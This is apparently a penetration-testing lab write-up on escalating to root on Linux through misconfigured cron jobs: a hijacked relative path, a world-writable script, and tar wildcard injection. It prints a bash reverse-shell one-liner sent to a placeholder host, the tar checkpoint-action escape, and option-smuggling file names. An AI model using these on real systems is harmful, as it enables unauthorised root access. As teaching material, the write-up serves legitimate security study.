Cronjobs are tasks that run on a schedule. These can be abused in a number of situations such as absolute paths not being declared or weak permissions on the files that are being executed.
We can enumerate for cronjobs by reading the cron table – /etc/crontab or for individual users – /var/spool/cron/ or /var/spool/cron/crontabs/.
In this case we have 2 user defined jobs – one runing a file (overwrite.sh) with no absolute path and another running /usr/local/bin/compress.sh, both run as root every minute.
No Absolute Path
Using locate to find the file overwrite.sh discovers the file located in /usr/local/bin, this directory is also on our path as the third location to check for the file.
If we have write permissions on a directory earlier in the path we can create a file with the same name there containing any contents that we like – in this case a simple bash script to spawn a reverse shell. Don’t forget to add executable permissions to the file.
#!/bin/bash
/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1
The cronjob runs every minute, so setting up a listener and waiting for up to a minute will provide a shell as root.
Insecure Permissions
In this case the file /usr/local/bin/overwrite.sh has world writable permissions set, meaning we can edit the file.
We can abuse this in the same way as writing our own file, this time though I appended a line to copy bash into /tmp and set the SUID bit.
Once again, a short wait and the cronbash file appears in /tmp with SUID set, running this will grant a shell as root.
Wildcards
Taking a look at compress.sh, we have no write or execute permissions, we can only read the file.
The file simply runs a script switching to /home/user then uses tar to compress the contents of /home/user to /tmp/backup.tar.gz by using a wildcard.
Checking https://gtfobins.github.io/gtfobins/tar/ for any shell escape methods using tar nets the following.
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shWe can create files in /home/user named as the switches used in this command.
I created a bash script named rshell.sh containing the following payload, gave it executable permissions and created 2 files –checkpoint=1 & –checkpoint-action=exec=rshell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1
This will essentially run the following command when the cronjob executes:
tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=rshell.sh myvpn.ovpn rhsell.sh toolsA short wait for the cronjob to execute and we are once again granted with a reverse shell as root.
Dan Rigby PenTesting 